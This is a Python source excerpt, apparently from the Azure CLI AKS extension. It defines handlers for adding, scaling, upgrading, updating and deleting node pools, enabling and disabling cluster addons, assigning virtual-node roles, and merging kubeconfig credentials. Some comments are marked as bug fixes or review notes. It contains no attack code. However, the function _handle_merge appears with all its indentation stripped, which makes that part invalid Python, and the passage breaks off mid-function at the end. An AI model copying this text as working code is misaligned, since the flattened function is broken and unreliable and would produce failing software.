def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
    """Grant the virtual-node addon identity Contributor rights on the VNet.

    Prefers the cluster's service principal when a real one exists;
    otherwise falls back to the addon's user-assigned MSI. Failures are
    only logged as warnings because the cluster itself already exists.
    """
    # Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
    vnet_id = vnet_subnet_id.rpartition('/')[0]
    vnet_id = vnet_id.rpartition('/')[0]

    service_principal_msi_id = None
    is_service_principal = False
    os_type = 'Linux'
    addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (addon_name in result.addon_profiles) and
            (hasattr(result.addon_profiles[addon_name], 'identity')) and
            (hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
    ):
        logger.info('virtual node MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                    service_principal_msi_id, is_service_principal, scope=vnet_id):
            logger.warning('Could not create a role assignment for virtual node addon. '
                           'Are you an Owner on this subscription?')
    else:
        # BUG FIX: the two adjacent literals previously concatenated to
        # "roleassignment" (missing space between 'role' and 'assignment').
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def aks_agentpool_show(cmd,     # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name,
                       nodepool_name):
    """Fetch a single agent pool of a managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd,     # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name):
    """List all agent pools of a managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd,      # pylint: disable=unused-argument,too-many-locals
                      client,
                      resource_group_name,
                      cluster_name,
                      nodepool_name,
                      tags=None,
                      kubernetes_version=None,
                      node_zones=None,
                      enable_node_public_ip=False,
                      node_public_ip_prefix_id=None,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      pod_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      os_sku=None,
                      enable_fips_image=False,
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      labels=None,
                      max_surge=None,
                      mode="User",
                      aks_custom_headers=None,
                      kubelet_config=None,
                      linux_os_config=None,
                      enable_encryption_at_host=False,
                      enable_ultra_ssd=False,
                      no_wait=False):
    """Add a new agent pool (node pool) to an existing managed cluster.

    Builds an AgentPool model from the CLI arguments and submits a
    create-or-update. Raises CLIError when a pool with the same name
    already exists or when autoscaler arguments are inconsistent.
    Returns the poller/result from the create-or-update call.
    """
    # Reject duplicate pool names up front for a friendlier error than the RP's.
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))

    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []

    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                # NOTE(review): str.strip()/list.append never raise ValueError,
                # so this branch is unreachable as written — taint strings are
                # passed through unvalidated. Confirm whether format validation
                # was intended here.
                raise CLIError(
                    'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')

    # Default VM size depends on the node OS.
    if node_vm_size is None:
        if os_type == "Windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"

    if max_surge:
        upgradeSettings.max_surge = max_surge

    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        os_sku=os_sku,
        enable_fips=enable_fips_image,
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        node_taints=taints_array,
        scale_set_priority=priority,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        mode=mode
    )

    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            # NaN default is translated to the service's -1 sentinel,
            # meaning "pay up to the current on-demand price".
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price

    # Validates min/max/node counts and flips enable_auto_scaling in place.
    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)

    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)

    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type

    if kubelet_config:
        agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)

    if linux_os_config:
        agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)

    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Manually scale an agent pool to node_count nodes.

    Rejected for autoscaler-managed pools and for a no-op count.
    """
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    new_node_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if new_node_count == instance.count:
        raise CLIError(
            "The new node count is the same as the current node count.")
    # Apply the new size on the fetched model and submit it back.
    instance.count = new_node_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd,  # pylint: disable=unused-argument
                          client,
                          resource_group_name,
                          cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          no_wait=False,
                          node_image_only=False,
                          max_surge=None,
                          aks_custom_headers=None):
    """Upgrade an agent pool's Kubernetes version and/or node image.

    --kubernetes-version and --node-image-only are mutually exclusive
    because a Kubernetes upgrade already implies a node image upgrade.
    """
    if kubernetes_version != '' and node_image_only:
        # BUG FIX: the two literals previously joined without a space
        # ("...node image version.If you only want...").
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)

    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    headers = get_aks_custom_headers(aks_custom_headers)

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd,  # pylint: disable=unused-argument
                                      client,
                                      resource_group_name,
                                      cluster_name,
                                      nodepool_name):
    """Return the available upgrade versions for an agent pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def aks_agentpool_update(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         tags=None,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         max_surge=None,
                         mode=None,
                         no_wait=False):
    """Update mutable agent pool settings: autoscaler state and bounds,
    tags, upgrade max-surge and pool mode.

    At most one of the three autoscaler flags may be used per invocation;
    alternatively tags/mode/max-surge may be changed without any of them.
    Returns None for the two early "already in that state" warnings,
    otherwise the create-or-update poller/result.
    """
    # Booleans sum to the number of autoscaler flags the caller supplied.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler

    if (update_autoscaler != 1 and not tags and not mode and not max_surge):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge"')

    instance = client.get(resource_group_name, cluster_name, nodepool_name)

    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')

    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError(
                'value of min-count should be less than or equal to value of max-count.')

    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # Already enabled: warn and bail out without touching the service.
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True

    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)

    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()

    if max_surge:
        instance.upgrade_settings.max_surge = max_surge

    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            logger.warning(
                'Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None

    # NOTE(review): tags are assigned unconditionally, so calling this command
    # without --tags clears any existing tags on the pool — confirm this is
    # the intended behavior.
    instance.tags = tags
    if mode is not None:
        instance.mode = mode

    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete an agent pool after verifying (case-insensitively) that it
    exists, for a friendlier error than the service would give."""
    agentpool_exists = False
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name.lower() == nodepool_name.lower():
            agentpool_exists = True
            break

    if not agentpool_exists:
        # BUG FIX: "doesnt" -> "doesn't" in the user-facing error message.
        raise CLIError("Node pool {} doesn't exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))

    return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable one or more addons on a managed cluster.

    When disabling the monitoring addon on a cluster that uses AAD/MSI auth,
    the Data Collection Rule association is removed first, because a dangling
    DCRA makes the DCR (and the cluster) hard to delete.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)

    try:
        # Only do DCRA cleanup when the monitoring addon is enabled AND is in
        # AAD-MSI-auth mode (config flag stringifies to 'true').
        if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
                instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
                CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
                str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
            # remove the DCR association because otherwise the DCR can't be deleted
            _ensure_container_insights_for_monitoring(
                cmd,
                instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
                subscription_id,
                resource_group_name,
                name,
                instance.location,
                remove_monitoring=True,
                aad_route=True,
                create_dcr=False,
                create_dcra=True
            )
    except TypeError:
        # NOTE(review): a TypeError here (e.g. addon_profiles or config being
        # None) is deliberately swallowed — the cleanup is best-effort and must
        # not block disabling the addon. Confirm this is intentional.
        pass

    instance = _update_addons(
        cmd,
        instance,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )

    # send the managed cluster representation to update the addon profiles
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
                      appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False, enable_msi_auth_for_monitoring=False):
    """Enable one or more addons on a managed cluster.

    Updates the addon profiles via _update_addons, provisions Container
    Insights resources for the monitoring addon, then submits the cluster
    update. Addons that need post-creation role assignments (monitoring,
    ingress-appgw, virtual-node) force a blocking wait so the result can be
    used for the assignment; otherwise no_wait is honored.
    """
    instance = client.get(resource_group_name, name)
    msi_auth = True if instance.service_principal_profile.client_id == "msi" else False  # this is overwritten by _update_addons(), so the value needs to be recorded here

    subscription_id = get_subscription_id(cmd.cli_ctx)

    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
                              appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)

    if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
        if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
                str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
            # MSI-auth monitoring requires the cluster itself to use MSI
            # (msi_auth was captured before _update_addons nulled the profile).
            if not msi_auth:
                raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
            else:
                # create a Data Collection Rule (DCR) and associate it with the cluster
                _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
        else:
            # monitoring addon will use legacy path
            _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)

    monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
        CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
        CONST_INGRESS_APPGW_ADDON_NAME].enabled

    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
        enable_virtual_node = True

    need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(
            client.begin_create_or_update(resource_group_name, name, instance))
        cloud_name = cmd.cli_ctx.cloud.name
        # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
        if monitoring and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)
        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                _add_virtual_node_role_assignment(
                    cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.

    else:
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):     # pylint: disable=unused-argument
    """Rotate the managed cluster's certificates (async by default)."""
    poller = sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
    return poller
def _update_addons(cmd,  # pylint: disable=too-many-branches,too-many-statements
                   instance,
                   subscription_id,
                   resource_group_name,
                   name,
                   addons,
                   enable,
                   workspace_resource_id=None,
                   enable_msi_auth_for_monitoring=False,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_prefix=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   enable_secret_rotation=False,
                   no_wait=False):  # pylint: disable=unused-argument
    """Enable or disable addon profiles on a managed cluster model in place.

    `addons` is a comma-separated list of CLI addon names (keys of ADDONS).
    When enabling, addon-specific config is built from the relevant keyword
    arguments; when disabling, the profile's config is cleared. Returns the
    mutated `instance` (with service_principal_profile and aad_profile
    nulled out to satisfy validation on the subsequent update call).
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')

    addon_profiles = instance.addon_profiles or {}

    os_type = 'Linux'

    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type

        # honor addon names defined in Azure CLI
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)

        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(
                addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                if not workspace_resource_id:
                    # fall back to the subscription's default LA workspace
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)

                addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
                addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError(
                        'The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {
                    CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # fresh profile: only the appgw options the caller provided are set
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_prefix is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
                                   'To change open-service-mesh configuration, run '
                                   f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={})
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
                                   'To change confcom configuration, run '
                                   f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
                                   'To change azure-keyvault-secrets-provider configuration, run '
                                   f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
                if enable_secret_rotation:
                    addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
                addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    # kube-dashboard may be absent on newer clusters; treat a
                    # disable request for it as a no-op profile
                    addon_profiles[addon] = ManagedClusterAddonProfile(
                        enabled=False)
                else:
                    raise CLIError(
                        "The addon {} is not installed.".format(addon))
            # disabling also wipes the addon's config
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable

    instance.addon_profiles = addon_profiles

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return instance
def aks_get_versions(cmd, client, location):   # pylint: disable=unused-argument
    """List the orchestrator (Kubernetes) versions available for managed clusters in *location*."""
    orchestrators = client.list_orchestrators(location, resource_type='managedClusters')
    return orchestrators
def aks_get_os_options(cmd, client, location):   # pylint: disable=unused-argument
    """List the OS options available for managed clusters in *location*."""
    os_options = client.get_os_options(location, resource_type='managedClusters')
    return os_options
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".

    :param path: destination kubeconfig path, or "-" to print instead of merging.
    :param kubeconfig: the kubeconfig content (YAML text) to merge in.
    :param overwrite_existing: replace colliding entries without prompting.
    :param context_name: optional context/cluster name override applied during the merge.
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # tolerate a concurrent creator of the directory; re-raise anything else
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # create with 0600: the kubeconfig holds credentials, so restrict it to the owner
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one
    # spill the new config into a temp file so the merge helper can load both sides from disk
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(
            path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        # best effort: a malformed config is reported as a warning, not a failure
        logger.warning(
            'Failed to merge credentials to kube config file: %s', ex)
    finally:
        additional_file.close()
        os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load and parse a kubeconfig YAML file.

    :param filename: path of the kubeconfig to read.
    :raises CLIError: when the file does not exist or cannot be parsed.
        Other OS-level errors (e.g. permission denied) are re-raised as-is.
    """
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename))
        # Bug fix: previously any other I/O error (e.g. EACCES) was swallowed
        # and the function silently returned None; propagate it instead.
        raise
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig at ``addition_file`` into ``existing_file``.

    :param existing_file: path of the user's kubeconfig (written back at the end).
    :param addition_file: path of the kubeconfig to merge in.
    :param replace: overwrite colliding entries without prompting.
    :param context_name: optional name assigned to the added context/cluster.
    :raises CLIError: when the addition cannot be loaded, or on an unresolved
        entry collision during the merge.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Bug fix: validate before first use. This check previously ran only after
    # `addition` had already been subscripted, so a failed load surfaced as a
    # TypeError instead of this friendly error.
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(
            stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(
        current_context, existing_file)
    print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
    """Build a CloudStorageAccount from credential kwargs, consuming them from *kwargs*."""
    from azure.cli.core.profiles import ResourceType, get_sdk
    t_cloud_storage_account = get_sdk(
        cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
    # pop the credential fields so they are not passed further down the pipeline
    credentials = {field: kwargs.pop(field, None)
                   for field in ('account_name', 'account_key', 'sas_token')}
    kwargs.pop('connection_string', None)  # consumed but unused here
    return t_cloud_storage_account(credentials['account_name'],
                                   credentials['account_key'],
                                   credentials['sas_token'])
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
    """Return the storage account id from the cluster's first diagnostic setting, or None."""
    from azure.mgmt.monitor import MonitorManagementClient
    diag_settings_client = get_mgmt_service_client(
        cli_ctx, MonitorManagementClient).diagnostic_settings
    subscription_id = get_subscription_id(cli_ctx)
    aks_resource_id = (
        '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.ContainerService'
        '/managedClusters/{}'
    ).format(subscription_id, resource_group_name, name)
    diag_settings = diag_settings_client.list(aks_resource_id)
